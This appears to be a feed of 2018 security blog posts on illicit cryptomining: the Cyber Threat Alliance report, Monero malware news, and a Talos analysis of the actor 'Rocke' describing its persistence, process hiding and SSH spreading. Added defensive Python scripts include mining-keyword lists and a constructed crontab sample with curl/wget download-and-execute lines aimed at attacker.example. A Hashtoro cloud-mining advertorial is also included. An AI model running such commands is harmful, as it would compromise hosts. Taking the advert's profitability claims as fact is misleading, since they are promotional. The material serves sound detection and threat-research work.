In response to the explosive increase in cryptomining campaigns in Q4 2017, the Cyber Threat Alliance has formed a cryptomining subcommittee to assess the threat. This committee comprises expert researchers from major cybersecurity companies, including McAfee. The committee has now released “The Illicit Cryptocurrency Joint Analysis,” an in-depth report on the current state of unlawful cryptomining. In the report we explain what led to the recent rise in cryptomining-based attacks, their impact, defense recommendations, and predictions for future evolution of the attack. As members of the Cyber Threat Alliance and the cybersecurity community, we hope that individuals and enterprises can use our research to protect themselves from this threat and improve global security.

The Rise of Illicit Cryptocurrency Mining

To understand the cryptomining threat we need to go back only to late 2017 and early 2018 to see the dramatic growth of cryptomining incidents. Since 2017, the combined data of several CTA members shows a 459% increase in detections of mining malware.

(Figure numbers are out of sequence. They are borrowed from the CTA report.)

The increase of mining malware positively correlates with the growth of the value of coins. Specifically, in late 2017 we saw the value of Bitcoin soar to US$20,000 per coin. Anything with a high value attracts cybercriminals, and cryptocurrencies experienced some of the most dramatic volatility ever of any currency. Cybercriminals were early adopters of cryptocurrencies and use them to fuel underground economies. They have increasingly turned to mining to increase their funds by stealing the computer power of their victims. This theft is also referred to as cryptojacking.

Cryptocurrency and Mining 

Cryptocurrencies have become an increasingly popular alternative to traditional electronic money (e-money). E-money is based on a fiat currency such as the U.S. dollar. One of the most common examples is prepaid credit cards, which represent the backing currency without the need for physical cash. Cryptocurrencies are generally not backed by a fiat currency. In fact, they are considered decentralized, meaning there is no central authority.

Monero has several advantages over Bitcoin in terms of privacy and anonymity; this makes it a favorite among bad actors. Beyond anonymity concerns, resources required to mine Monero are significantly lower, enabling more users to participate and increasing the profitability of botnets.

The act of generating the coin is called mining: the use of system resources to solve a complex mathematical problem. Most major coins employ a “proof of work” that requires CPU resources to solve. Large groups of miners, including botnets, can combine their resources on a single problem; this is called pool mining. A successful mining operation produces a solved mathematical equation that returns newly minted coins to the system and validates new transactions.

The State of Illicit Cryptocurrency Mining

Current incidents of illicit cryptomining mostly occur through compiled executables, a practice called binary-based mining. When the mining code runs inside a browser instead, the practice is called browser-based mining. Binary-based cryptomining malware is delivered as a payload, often using spam or exploit kits. Open-source tools often facilitate mining: XMRig is a legitimate tool for mining Monero, yet it is also frequently used by malicious actors for illicit cryptomining.

The most common browser-based miner is Coinhive. Used legitimately, it offers an alternative to ad revenue by monetizing system resources. However, it has been widely used without informing users. On occasion the owner of the service is unaware of the mining code; this was the case with a recent attack against both Facebook Messenger and Starbucks Wi-Fi. As of July 2, PublicWWW yielded at least 23,000 websites hosting Coinhive code.

An example of Coinhive script embedded within a website.

Beyond using browsers to gather system resources, malware authors have become increasingly sophisticated in other ways. They have taken advantage of widespread vulnerabilities such as EternalBlue to propagate, or have implemented other techniques for evasion. The Smominru attack was a very profitable campaign leveraging this approach. It used “living off the land” techniques to evade detection and increase its ability to mine Monero.

Impacts of Illicit Cryptocurrency Mining

Cryptomining may have an impact on both the short- and long-term security of an organization or user. Three primary impact areas include:

  • Potential security flaws that can lead to additional attacks
  • Physical damage
  • Impacts to business operations and productivity

If a device is used in an unauthorized way, there is evidence of a potential security flaw that needs to be addressed. In late 2017, misconfigured devices using FTP led to hundreds of thousands of Monero miners on consumer-grade devices. Bad actors can and have used these same flaws for additional attacks against the systems.

Physical damage is also a concern. The CPU-intensive operation of mining will produce excess heat and power consumption. For small devices the immediate concern is battery life. However, for large systems, especially data centers, the activity can increase the failure rate of components; this can have a major effect on the system. Ultimately this may lead to costly repairs or increased hardware requirements to support the expanded load.

Organizations may also see a hit to business operations. Mass-computing projects present a similar concern, albeit for more altruistic purposes. Folding@Home, a medical research project aimed at understanding proteins, can be installed to use computer resources to help the research. However, business operations may be impacted by a loss of productivity or additional costs. Many businesses prohibit installing these types of computing projects to protect against unexpected costs and disruptions.

Recommended Best Practices

Fortunately, the defense against cryptomining is very similar to that against other threats. Cryptomining malware uses the same tools and methods; thus maintaining good security practices goes a long way. These include analysis of non-typical network traffic, and properly configuring and patching systems. A few additional steps specific to cryptomining:

  • Monitor abnormal power consumption and CPU activity
  • Search logs for related mining strings such as Crypto, Coinhive, XMR, Monero, and cpuminer
  • Block mining pool communications
  • Use browser extensions to protect against browser-based cryptocurrency mining

For a more comprehensive list, including recommended Snort rules, see the Recommended Best Practices section of the report.
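As an added example (not code from the CTA report or McAfee), the following Python script applies two items from the list above to a constructed set of log lines: it searches for the listed mining strings and extracts stratum pool endpoints that could feed a block list. The stratum URL scheme is the one pool miners such as XMRig use; the pool host, ports and log lines are constructed for the example.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Strings the CTA list recommends searching logs for. The regex anchors on a
# word start but lets the token run on, so "XMRig" and "cpuminer.exe" are
# caught along with "XMR" and "cpuminer"; the price is noise such as
# "cryptography", which is why matches are reported for triage, not blocked.
MINING_KEYWORDS = ("crypto", "coinhive", "xmr", "monero", "cpuminer")
KEYWORD_RE = re.compile(
    r"\b((?:" + "|".join(MINING_KEYWORDS) + r")\w*)", re.IGNORECASE
)

# Pool miners such as XMRig connect to pools with stratum URLs; the scheme is
# real, the pool host used in the sample log below is constructed.
STRATUM_RE = re.compile(
    r"stratum\+(?:tcp|ssl)://(?P<host>[A-Za-z0-9.\-]+):(?P<port>\d{2,5})",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Finding:
    line_no: int
    kind: str       # "pool" or "keyword"
    indicator: str  # "host:port" for pools, the matched token for keywords
    line: str


def scan_line(line_no: int, line: str) -> List[Finding]:
    """Return every pool endpoint and mining keyword found in one log line."""
    found = []
    for m in STRATUM_RE.finditer(line):
        found.append(Finding(line_no, "pool", f"{m['host']}:{m['port']}", line))
    for m in KEYWORD_RE.finditer(line):
        found.append(Finding(line_no, "keyword", m.group(1).lower(), line))
    return found


def scan_log(lines: Iterable[str]) -> Dict[str, object]:
    """Scan a log and summarise: all findings, the pool endpoints to block,
    and how often each keyword token appeared (for triage of noisy ones)."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, start=1):
        findings.extend(scan_line(n, line))
    pool_endpoints = sorted({f.indicator for f in findings if f.kind == "pool"})
    keyword_counts = Counter(f.indicator for f in findings if f.kind == "keyword")
    return {
        "findings": findings,
        "pool_endpoints": pool_endpoints,
        "keyword_counts": dict(keyword_counts),
    }


# Constructed log lines: a firewall line (no indicator by itself), a miner
# config with a pool URL, a dropped cpuminer binary, a benign TLS line that
# trips the "crypto" keyword, and an XMRig start-up message.
SAMPLE_LOG = [
    "2018-09-18T09:41:07Z fw ALLOW tcp 10.0.8.23:51934 -> 203.0.113.77:3333",
    "2018-09-18T09:41:08Z host10 miner.cfg url=stratum+tcp://pool.example.test:3333",
    "2018-09-18T09:42:15Z host10 process start C:\\Users\\bob\\AppData\\Local\\Temp\\cpuminer.exe",
    "2018-09-18T09:43:00Z host14 schannel: using crypto provider for TLS 1.2",
    "2018-09-18T09:45:30Z host22 xmrig 2.8.1 starting, algo cryptonight",
]

if __name__ == "__main__":
    report = scan_log(SAMPLE_LOG)
    for f in report["findings"]:
        print(f"line {f.line_no}: {f.kind:7} {f.indicator}")
    print("pool endpoints to block:", report["pool_endpoints"])
    print("keyword tokens:", report["keyword_counts"])
```

The first firewall line is not flagged on its own: a bare port number is not evidence, and it only becomes interesting once the pool endpoint from the config line is known.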

The Evolution of Illicit Mining

Illicit cryptocurrency mining appears to have a positive correlation with Bitcoin value. As long as cryptocurrencies such as Bitcoin have value, we expect bad actors will continue to mine for profits. Although public cryptocurrencies like Bitcoin may be closely tied to monetary value, private or custom blockchains are also at risk and also need to prepare against future attacks.

Private blockchains, including non-currency-related ones, may carry unique risks. Large blockchains such as Bitcoin are considered immutable due to the difficulty of changing historical ledger data. Private blockchains inherently lack the same scale of adoption and thus may be more susceptible to attacks. The 51% attack is a well-known threat that can take advantage of a smaller network and have a severe impact on the blockchain’s integrity.

With some nation-states already turning to cryptocurrencies to solve economic issues, it is likely that some nation-states will use illicit mining to gain revenue. State-sponsored actors have already been implicated in the theft of cryptocurrencies, as McAfee has reported. Legitimately mined cryptocurrency has been implicated in obfuscating state-sponsored cyber operations, hiding purchases of VPN accounts, servers, and domain registrations.

Conclusion

“The Illicit Cryptocurrency Joint Analysis” represents the first joint industry initiative to educate enterprises and consumers about the growing threat of cryptocurrency mining. By improving security postures and adhering to proper security practices, we can increase the difficulty of these attacks succeeding, thus disrupting malicious behavior. Illicit cryptocurrency mining is not a fad. This problem will likely grow in relation to the value of cryptocurrencies. Current infection methods will give way to new techniques and exploits. The attraction of stealing cryptocurrencies may lead actors to develop targeted attacks against private implementations of blockchain as they become more prevalent. For more on illicit cryptomining threats, read the introductory blog, key findings summary, and the full report to learn about this important research.

The post Cyber Threat Alliance Releases Analysis of Illicit Cryptocurrency Mining appeared first on McAfee Blogs.


Hackers Exploited Flaw In EOSBet Smart Contract To Steal 44,000 EOS

Once again, the crypto world faced another cyber attack losing several thousands of dollars to hackers. This time, the hackers

Hackers Exploited Flaw In EOSBet Smart Contract To Steal 44,000 EOS on Latest Hacking News.

Two New Monero Malware Attacks Target Windows and Android Users

Researchers spotted two new Monero malware attacks targeting Windows and Android devices that hide in plain sight and masquerade as legitimate application updates.

Quick Heal Security Labs discovered the new “invisible” Monero mining infection trying to hide on Windows PCs. Once installed, this self-extracting executable unpacks a VBS script, an extraction utility, a password-protected archive and a batch file in the C:/ProgramFiles/Windriverhost directory. It then launches ouyk.vbs to maintain persistence and xvvq.bat to keep the computer from sleeping by changing power settings with the PowerCFG command.

Finally, it runs the driverhost.exe mining program, which mines for Monero, while xvvq.bat regularly checks for analysis and antivirus tools using the tasklist command. The infection vector is currently unknown, but Quick Heal speculated that spear phishing and malvertising are likely culprits.

Meanwhile, as noted by Fortinet, the Android/HiddenMiner.A!tr malware attempts to compromise Android devices by posing as an update to the Google Play Store. If installed on an emulator or virtual machine, it shuts down to avoid analysis. If installed on a mobile device, it activates and asks for administrative privileges. If not granted, the malware will continue asking for permission until users allow installation.

Monero Malware Hides in Plain Sight

Along with efforts to avoid analysis, Quick Heal noted that the Monero malware also limits central processing unit (CPU) usage to 35 percent for all mining activity. Given the persistence of the malware and the low CPU cap, users may not encounter the system performance issues and application lag commonly associated with mining attacks, improving the malware’s ability to go undetected for long periods of time.

On the other hand, the HiddenMiner malware is problematic for Android users because it appears in the Google Play Store as an update to the Store itself. As a result, users aren’t surprised by requests for admin rights since the “update” seemingly comes from Google.

How to Mitigate the Threat of Monero Malware

Shutting down these Monero malware tools requires keeping devices up to date and regularly checking desktops for indicators of compromise (IoCs). As noted by IBM X-Force Exchange, the HiddenMiner malware won’t work on Android 7.0 or later thanks to a change in the Android Package (APK) format that introduced a new signing mechanism. Malware attempting to execute on devices running 7.0 or later will instead return an error message.

IBM security professionals also recommend targeting common IoCs to detect mining malware. As noted by Quick Heal, a flaw in the xvvq.bat file means it only kills driverhost.exe if taskmgr.exe is running — making it easier for security teams to track down the driverhost.exe IoC and take action to remove the malware.
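The following Python is an added example, not code from Quick Heal, IBM X-Force or this post. It matches running processes against the file names and directory reported above and, because a miner capped at 35 percent never trips a high-CPU alert, also flags a process whose CPU share stays flat at a moderate level for a whole sampling window. The CPU samples, thresholds and path normalisation are assumptions made for the example.

```python
import statistics
from typing import Dict, List, Sequence, Tuple

# Artefacts the post reports for this infection, used only as host IoCs.
# The post writes the directory as C:/ProgramFiles/Windriverhost; slashes
# are normalised before comparison.
KNOWN_IOC_NAMES = {"driverhost.exe", "ouyk.vbs", "xvvq.bat"}
KNOWN_IOC_DIR = "c:\\programfiles\\windriverhost"


def steady_load(samples: Sequence[float], min_mean: float = 20.0,
                max_mean: float = 60.0, max_stdev: float = 5.0,
                min_samples: int = 30) -> bool:
    """True when a process held a near-constant, moderate CPU share across
    the whole window. A spike detector keyed on high CPU never fires on a
    miner capped at 35 percent; a low-variance plateau does. The thresholds
    are assumptions for one sample per minute, not values from the post."""
    if len(samples) < min_samples:
        return False
    mean = statistics.mean(samples)
    stdev = statistics.pstdev(samples)
    return min_mean <= mean <= max_mean and stdev <= max_stdev


def _normalise(path: str) -> str:
    """Lower-case a Windows path and turn forward slashes into backslashes."""
    return path.replace("/", "\\").lower()


def triage(processes: Dict[str, Tuple[str, Sequence[float]]]) -> Dict[str, List[str]]:
    """processes maps an image name to (full path, CPU percent samples).
    Returns the reasons each process is suspicious; an empty list is clean."""
    verdicts: Dict[str, List[str]] = {}
    for name, (path, samples) in processes.items():
        reasons = []
        if name.lower() in KNOWN_IOC_NAMES or _normalise(path).startswith(KNOWN_IOC_DIR):
            reasons.append("known IoC")
        if steady_load(samples):
            reasons.append("steady moderate CPU")
        verdicts[name] = reasons
    return verdicts


# Constructed one-minute CPU samples for an hour: the named miner and an
# unknown copy of it both sit at 33-37 percent; a browser bursts to 90 and
# idles at 5; a service idles at 2.
SAMPLE_PROCESSES = {
    "driverhost.exe": ("C:/ProgramFiles/Windriverhost/driverhost.exe",
                       [33 + (i % 5) for i in range(60)]),
    "updater.exe": ("C:\\Users\\bob\\AppData\\Local\\updater.exe",
                    [33 + (i % 5) for i in range(60)]),
    "chrome.exe": ("C:\\Program Files\\Google\\Chrome\\chrome.exe",
                   [90 if i % 7 == 0 else 5 for i in range(60)]),
    "svchost.exe": ("C:\\Windows\\System32\\svchost.exe", [2] * 60),
}

if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_PROCESSES).items():
        print(f"{name:15} {', '.join(reasons) or 'clean'}")
```

The renamed copy is caught by behaviour alone, which is the point of pairing a name-based IoC check with a resource-usage check.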

Sources: Quick Heal Security Labs, Fortinet

The post Two New Monero Malware Attacks Target Windows and Android Users appeared first on Security Intelligence.

Researchers Observe Threat Actor Using Varied Tools and Payloads to Distribute Monero Miners

A new threat actor is leveraging a varied tool kit and multiple payloads to distribute cryptomining malware, including Monero miners.

In April, Cisco Talos observed a new threat actor named Rocke using western and Chinese Git repositories to deliver cryptomining malware to honeypots that were vulnerable to an Apache Struts vulnerability.

Researchers detected Rocke conducting a similar campaign in July. In that operation, the threat actor communicated with an HTTP File Server (HFS) hosting 11 files. Two of those files — “TermsHost.exe” and “Config.json” — were the executables or configuration files for Monero miners. Many of the other hosted assets were shell scripts responsible for downloading and executing the miners or for killing processes that are commonly associated with other cryptomining malware or cryptomining in general.

Cryptomining Malware Continues to Grow

Rocke’s attack campaigns represent the latest offensives in an ongoing surge of cryptomining malware. In the first quarter of 2018, McAfee Labs detected a 629 percent increase in these threats, with the total number of detected samples rising from 400,000 to more than 2.9 million.

This growth coincides with a FireEye report that found a sharp increase in underground conversations containing cryptocurrency mining-related keywords beginning in 2017 and continuing through the first quarter of 2018.

These findings are also consistent with a sixfold increase in attacks involving embedded mining tools, which IBM Managed Security Services (MSS) observed between January and August 2017.

Defending Against Monero Miners

Security professionals can defend their organizations against threat actors that aim to spread Monero miners by scanning for the indicators of compromise (IoCs) identified in Cisco Talos’ report. Organizations should also consider implementing security best practices that offer blanket protection against malware and other digital threats. These controls should include the creation of a patch prioritization plan for security weaknesses affecting servers and other critical IT assets.

Sources: Cisco Talos, McAfee Labs, FireEye

The post Researchers Observe Threat Actor Using Varied Tools and Payloads to Distribute Monero Miners appeared first on Security Intelligence.

Compromised Chrome Extension Snooped on Users’ Credentials, Cryptocurrency Private Keys

Someone compromised a Google Chrome extension with malicious code designed to snoop on users’ account credentials and cryptocurrency private keys. On 4 September, a security researcher who goes by the name “SerHack” tweeted out a warning about version 3.39.4 of the Chrome extension for MEGA.nz, a cloud storage and file sharing service. !!! WARNING !!!!!!! […]

The post Compromised Chrome Extension Snooped on Users’ Credentials, Cryptocurrency Private Keys appeared first on The State of Security.

Top cloud mining trends of 2018: altcoins, ASIC chips and machine learning

Despite the recent downward trends, the cryptocurrency boom goes on. The most popular coins, such as Bitcoin and Ethereum, are widely accepted as payment. As the number of miners in these cryptocurrencies’ networks increases, the competition grows, pushing the hash difficulty up. It’s not an easy time for mining, and experts suggest that its future lies in the cloud.

Before, cloud mining was a simpler way to enter the crypto mining market without making large investments. Now, in some cases, it is the only way. Popular cryptocurrencies are becoming less and less profitable to mine independently, or are hovering on the edge of unprofitability, as in the case of Bitcoin. To mine successfully today, we have to mine effectively. This means using specialized equipment and optimizing the process by all available means.

What’s up, Bitcoin?

Bitcoin is the first and, up to this day, the most wanted coin. Just a few years ago you could mine BTC on a regular home PC, but now it’s impossible. High demand started a crazy equipment race, and in this kind of competition big players win.

To stay in the game, today’s bitcoin miners need to make large investments and perform constant power upgrades. Some take advantage of their location, but most solo miners have little flexibility as to where to build a rig.

With the emergence of application-specific integrated circuit (ASIC) chips, which are more efficient than GPUs, the stakes rose. The actual cost of solving the blocks is getting close to the amount of the reward, which poses a problem even for cloud BTC mining.

This is why many individual miners turned to emerging or ASIC-resistant coins, which promised a smaller reward but also less competition. Still, with a proper approach, even Bitcoin mining remains profitable. The key is efficiency: increasing the power and lowering the overall cost of mining. The same approach also works for less popular coins, increasing the total revenue for the miners.

How to get the highest ROI in cloud mining

Hashtoro.com is aimed at Bitcoin, Ethereum and Litecoin cloud mining. As these cryptocurrencies are in wide use now, the project was carefully created with all the aforementioned issues in mind. Here are the top trends the team has picked to develop a profitable cloud mining system for popular coins:

  • cutting electricity costs by using renewable energy,
  • using ASIC miners with immersion cooling,
  • using cutting-edge technology to optimize the mining process.

First, Hashtoro uses renewable sources of energy to power their equipment. The farms are located in European countries with access to cheaper, clean electricity. The excess heat will be used to heat water for local communities, which cuts the energy expenses even more.

Second, ASIC miners with immersion cooling are used, and the team also plans to design its own ASIC chip in the near future to optimize the process further. This keeps the mining cost as low as possible and lets Hashtoro offer its clients cheaper contracts.

Third, due to the high volatility of the crypto market, it is hard to give any long-term prognoses on rate dynamics. At the beginning of this year Ethereum and Litecoin were leading the race, but when their prices dropped, Bitcoin came to the fore once again.

The project's software is based on cutting-edge machine learning and neural network technologies. "The system determines which currency is more profitable to mine at a given time and dynamically switches to it. It also chooses the appropriate pool to make the highest profit. This way the miners will gain the most from the hashrate they buy," comments Alexander Petersons, product director of Hashtoro.

At the moment, the combined cryptocurrency market capitalization is around 254 billion US dollars. That is almost a third of the 830 billion maximum we saw in January, but we can be sure: cryptocurrencies are here to stay. Under certain conditions, the crypto market could enter a new stage of growth very soon. In the coming months we will see more cloud mining services appear. And with the right approach, regardless of all the challenges we face at the moment, mining will remain not just an interesting hobby but also a good source of income.

The post Top cloud mining trends of 2018: altcoins, ASIC chips and machine learning appeared first on TechWorm.

Rocke: The Champion of Monero Miners


This post was authored by David Liebenberg.


Summary


Cryptocurrency miners are becoming an increasingly significant part of the threat landscape. These malicious miners steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor.

In this post, we look at the activity of one particular threat actor: Rocke. We will examine several of Rocke's campaigns, malware, and infrastructure while uncovering more information about the actor. After months of research, we believe that Rocke is an actor that must be followed, as they continue to add new features to their malware and are actively exploring new attack vectors.

Introduction


Talos has written widely about the issue of cryptomining malware and how organizations should protect systems against this threat. We continue to actively research developments in this threat through research that includes monitoring criminal forums and deploying honeypot systems to attract these threats. It is through these intelligence sources that the Chinese-speaking actor which we refer to as "Rocke" came to our attention.

Rocke actively engages in distributing and executing cryptomining malware using a varied toolkit that includes Git repositories, HttpFileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners.

Early campaigns


This threat actor initially came to our attention in April 2018, leveraging both Western and Chinese Git repositories to deliver malware to honeypot systems vulnerable to an Apache Struts vulnerability.

Several files were downloaded to our Struts2 honeypot from the Chinese repository site gitee.com for a user named "c-999." Subsequently, the Gitee user page transitioned to "c-888." Around the same time, we observed similar activity pulling down files from a gitlab.com repository page for a user named "c-18."

The repositories on both Gitee and GitLab were identical. All the repositories had a folder called "ss" that contained 16 files. The files were a collection of ELF executables, shell scripts, and text files that execute a variety of actions, including achieving persistence and the execution of an illicit cryptocurrency miner.

Once the threat actor had compromised a system, they achieved persistence on the device by installing a cron job that downloads and executes a file "logo.jpg" from "3389[.]space." This file is a shell script which, in turn, downloads mining executables from the threat actor's Git repositories and saves them under the filename "java." The exact file downloaded depends on the victim's system architecture. Similarly, the system architecture determines if "h32" or "h64" is used to invoke "java."

Although we first observed this actor exploiting vulnerabilities in Apache Struts, we've also observed what we believe to be the same individual exploiting an Oracle WebLogic server vulnerability (CVE-2017-10271), and also exploiting CVE-2017-3066, a critical Java deserialization vulnerability in the Adobe ColdFusion platform.

Recent campaign


In late July, we became aware that the same actor was engaged in another similar campaign. Through our investigation into this new campaign, we were able to uncover more details about the actor.

We observed a wget request from our Struts2 honeypot for a file named "0720.bin" located on 118[.]24[.]150[.]172:10555. We visited this IP and found it was an open HFS hosting "0720.bin" along with 10 additional files: "3307.bin," "a7," "bashf," "bashg," "config.json," "lowerv2.sh," "pools.txt," "r88.sh," "rootv2.sh" and "TermsHost.exe." We set about examining these files.


Screenshot of HFS system



We had previously observed this same IP scanning for TCP port 7001 throughout May 2018. This was potentially a scan for Oracle WebLogic servers, which listen on TCP port 7001 by default.

Both "0720.bin" and "3307.bin" are similar ELF files of similar size (84.19KB) that reach out to 118[.]24[.]150[.]172, and were marked clean in VirusTotal at the time of discovery. Morpheus Labs described a similar file that connects to the same IP address, which could open a shell on the victim's machine if a password-verified instruction was issued from the C2. In both our samples, as well as the ones that Morpheus Labs described, the hard-coded password was not only identical, but also located at the same offset.

Hard-coded password



"A7" is a shell script that kills a variety of processes related to other cryptomining malware (including those with names matching popular mining malware such as "cranberry," "yam," or "kworker"), as well as mining in general (such as "minerd" and "cryptonight"). It detects and uninstalls various Chinese AV products, and also downloads and extracts a tar.gz file from blog[.]sydwzl[.]cn, which also resolves to 118[.]24[.]150[.]172. The script downloads a file from GitHub called "libprocesshider," which hides a file called "x7" through the dynamic linker's preload mechanism (ld.so.preload). The script looks for IP addresses in known_hosts and attempts to SSH into them, before downloading "a7" again from the actor's HFS at 118[.]24[.]150[.]172 and executing it.

Extract of Source Code of "a7"




"Config.json" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This is why we have named the actor "Rocke" (note that for MinerGate, an email can be used in place of a Monero wallet number — it's simply the login email for the MinerGate platform). "Pools.txt" appears to be a config file for XMR-stak, an open-source universal Stratum pool miner that mines Monero, Aeon and more. This configuration file contains the same actor pool and wallet information as the first.
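Host-triage checks for the tradecraft described above: the download-and-execute cron job ("logo.jpg"), the ld.so.preload hiding used by "a7," and the pool and wallet fields of an XMRig-style "config.json." This is an added example with constructed sample input, not code from the Talos post; attacker.example, the file paths and the login address are placeholders.

```python
"""Host-triage checks for the Linux miner tradecraft described above.

Added example with constructed sample data; attacker.example and the
file paths below are placeholders, not indicators from the Talos post.
"""
import json
import re
from dataclasses import dataclass

# A cron entry that fetches remote content and then runs it is the
# persistence pattern of the "logo.jpg" job: download a script, pipe it to
# a shell, and let cron repeat that indefinitely.
FETCH_RE = re.compile(
    r"\b(?:curl|wget)\b[^|;&]*?(?:https?|ftp)://(?P<host>[^/\s\"']+)")
EXEC_RE = re.compile(
    r"\|\s*(?:ba)?sh\b"            # ... | sh
    r"|[;&]+\s*(?:ba)?sh\s+\S+"    # ...; sh /tmp/x
    r"|\bchmod\s+\+x\b")           # make the download executable


@dataclass
class Finding:
    source: str
    detail: str
    reason: str


def check_cron(lines):
    """Flag crontab lines that download from a remote host and execute the result."""
    findings = []
    for line in lines:
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        fetch = FETCH_RE.search(entry)
        if fetch and EXEC_RE.search(entry):
            findings.append(Finding("crontab", entry,
                                    f"download-and-execute from {fetch.group('host')}"))
    return findings


def check_preload(lines):
    """Flag every library listed in /etc/ld.so.preload.

    The file is normally empty; libprocesshider-style tooling adds a shared
    object here so it is loaded into every process and can filter the
    miner out of the /proc listings that ps and top display.
    """
    return [Finding("ld.so.preload", p.strip(), "library injected into every process")
            for p in lines if p.strip() and not p.strip().startswith("#")]


def pool_accounts(config_text):
    """Return (pool, user) pairs from an XMRig-style config.json.

    XMRig keeps its pools under a top-level "pools" list with "url" and
    "user" keys; on MinerGate the user field is a login e-mail, which is
    what let the researchers name the actor.
    """
    cfg = json.loads(config_text)
    return [(p.get("url", ""), p.get("user", "")) for p in cfg.get("pools", [])]


# Constructed samples, not captured artefacts.
SAMPLE_CRON = """\
# constructed crontab modelled on the persistence described above
*/10 * * * * (curl -fsSL http://attacker.example/logo.jpg || wget -qO- http://attacker.example/logo.jpg) | sh
0 3 * * * /usr/bin/apt-get update
@reboot wget -q -O /tmp/.x http://attacker.example/x86_64 && chmod +x /tmp/.x && /tmp/.x
""".splitlines()

SAMPLE_PRELOAD = ["/usr/local/lib/libprocesshider.so"]  # placeholder path

SAMPLE_CONFIG = json.dumps({
    "pools": [{"url": "pool.example:45700", "user": "miner-login@example.net", "pass": "x"}]
})


def triage():
    """Run every check over the constructed samples; returns (findings, pools)."""
    return check_cron(SAMPLE_CRON) + check_preload(SAMPLE_PRELOAD), pool_accounts(SAMPLE_CONFIG)


if __name__ == "__main__":
    findings, pools = triage()
    for f in findings:
        print(f"[{f.source}] {f.reason}: {f.detail}")
    for url, user in pools:
        print(f"[config.json] pool={url} user={user}")
```

On a live host the same functions would be fed the output of `crontab -l` for each user, the contents of /etc/cron.d and /etc/ld.so.preload, and any config.json found next to a suspicious binary.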

"Bashf" is a variant of XMR-stak while "bashg" is a variant of XMRig.



"Lowerv2.sh" and "rootv2.sh" are similar shell scripts that attempt to download and execute the mining malware components "bashf" and "bashg," hosted on 118[.]24[.]150[.]172. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called "XbashY" from 3g2upl4pq6kufc4m[.]tk.

"R88.sh" is a shell script that installs a cron job and attempts to download "lowerv2.sh" or "rootv2.sh."

"TermsHost.exe" is a PE32 Monero miner. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into "Windows processes to bypass firewalls." The sample grabs the config file "xmr.txt," which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample then injects code into notepad.exe, which then proceeds to communicate with the MinerGate pool. The sample also creates the UPX-packed file "dDNLQrsBUE.url" in the Windows Start Menu Folder. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system.

The payload appears to be similar to one used by the Iron Cybercrime Group, as reported by cybersecurity firm Intezer in May. Both Iron and Rocke's malware behave similarly, and reach out to similar infrastructure. So, while we can assess with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group.

The actor


Through Rocke's MinerGate Monero wallet email rocke@live.cn, we were able to uncover additional information about the actor. We noticed that Rocke's C2 was registered to the address jxci@vip.qq.com. We then found a leak of user information from the Chinese security site FreeBuf that showed that a user named "rocke" was associated with the email jxci@vip.qq.com. This suggested that they were one and the same. [4]

Rocke has been observed seeking access to cloud storage services, as well as obtaining manuals for programming in the Chinese Easy language.

The majority of websites registered to Rocke list Jiangxi Province addresses for their registration. Some of these websites were for Jiangxi-based businesses, such as belesu[.]com, which sells baby food. We had additional indications that Rocke is from Jiangxi based on their GitHub (see below). It is possible that the "jx" in jxci@vip.qq.com stands for Jiangxi. Therefore, we assess with high confidence that Rocke operates from Jiangxi Province.

The GitHub


We identified a GitHub page apparently associated with Rocke. The GitHub page lists Rocke as being affiliated with Jiangxi Normal University. In one repository folder, we found several of the same files which were found on the HFS system, including several of the shell scripts with their wallet information included, as well as variants of the miner.



We found additional repositories for the same account. Within these repositories, we found scripts similar to those found in previous campaigns, with the exception that they reached out to sydwzl[.]cn in addition to the previously observed domain 3389[.]space. These findings support the link between Rocke and the activity we previously observed in April and May.

We also found an additional repository through Rocke's page that's hosting nearly identical content, but with a different C2. However, we are unable to determine how that page is being used or who is using it.

The files within their various repositories show that Rocke has become interested in browser-based JavaScript mining through the tool CryptoNote, as well as browser-based exploitation through the Browser Exploitation Framework. It appears that they are relying on fake Google Chrome alerts, fake apps, and fake Adobe Flash updates to social engineer users into downloading malicious payloads.





One of the JavaScript files in the repository, named "command.js," uses hidden IFrames to deliver payloads hosted on CloudFront domains. The payload that we were able to obtain was UPX packed and behaved very similarly to the file "dDNLQrsBUE.url" dropped by "TermsHost.exe."

Rocke has also shown interest in other security-related repositories. They have forked repositories with exploit information, including those related to Apache Struts 2, JBoss and Shadow Brokers, as well as more general-use tools such as masscan, proxy tools and brute forcers.

Conclusion


Based on their activity in the past few months, Talos assesses with high confidence that Rocke will continue to leverage Git repositories to download and execute illicit miners on victim machines. It is interesting to note that they are expanding their toolset to include browser-based miners, difficult-to-detect trojans, and Cobalt Strike. Besides noisy scan-and-exploit activity, it appears that Rocke is likely also pursuing social engineering as a new infection vector, as demonstrated by the repositories involving fake Adobe Flash and Google Chrome updates.

Despite the volatility in the value of various cryptocurrencies, the trend of illicit cryptocurrency mining activity among cybercriminals shows no signs of abating. Rocke's various campaigns show the variety of infection vectors, malware, and infrastructure that these criminals will employ to achieve their goals.

IOCs:



Earlier campaign:



Attacking IPs targeting Struts:



52[.]167[.]219[.]168: Attacking IP using repo at gitlab
120[.]55[.]226[.]24: Attacking IP using repo at gitee

Attacking IP targeting WebLogic:



27[.]193[.]180[.]224

Attacking IPs targeting ColdFusion:



112[.]226[.]250[.]77
27[.]210[.]170[.]197
112[.]226[.]74[.]162

Domains


3389[.]space

URLs



Hashes:



More recent campaign:



IPs


123[.]249[.]9[.]149: Issues get request for 0720.bin
118[.]24[.]150[.]172: Rocke's HFS, also resolves to C2 sydwzl[.]cn

Domains:


sydwzl[.]cn
blockbitcoin[.]com: Reached out to by Install.exe
